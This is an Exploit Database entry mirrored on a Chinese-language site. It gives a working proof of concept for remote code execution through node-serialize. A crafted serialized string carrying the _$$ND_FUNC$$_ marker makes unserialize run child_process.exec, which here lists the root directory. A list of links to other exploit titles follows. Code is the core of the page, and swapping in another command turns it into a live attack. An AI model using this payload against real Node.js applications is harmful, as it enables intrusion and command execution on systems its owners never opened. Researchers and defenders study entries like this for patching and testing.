Node.JS – ‘node-serialize’ Remote Code Execution

Exploit Database
135 阅读

作者： OpSecX

日期： 2017-02-08
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/45265/

var serialize = require('node-serialize');

var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';

serialize.unserialize(payload);

last Exploits
Node.JS – ‘node-serialize’ Remote Code Execution的更多信息

Microsoft Windows Media Encoder 9 – ‘wmex.dll’ ActiveX Buffer Overflow (MS08-053) (Metasploit)：
Adobe Flash Player – PCRE Regex (Metasploit)：
Eureka Email Client 2.2q – ERR Remote Buffer Overflow (Metasploit) (2)：
Eudora Qualcomm WorldMail 3.0 – IMAPd ‘LIST’ Remote Buffer Overflow (Metasploit)：
LabF nfsAxe FTP Client 3.7 – Remote Buffer Overflow (DEP Bypass)：
Microsoft Internet Explorer – CCaret Use-After-Free (MS13-069) (Metasploit)：
Microsoft AntiXSS 3/4.0 Library Sanitization Module – Security Bypass：
Nuuo Central Management – (Authenticated) SQL Server SQL Injection (Metasploit)：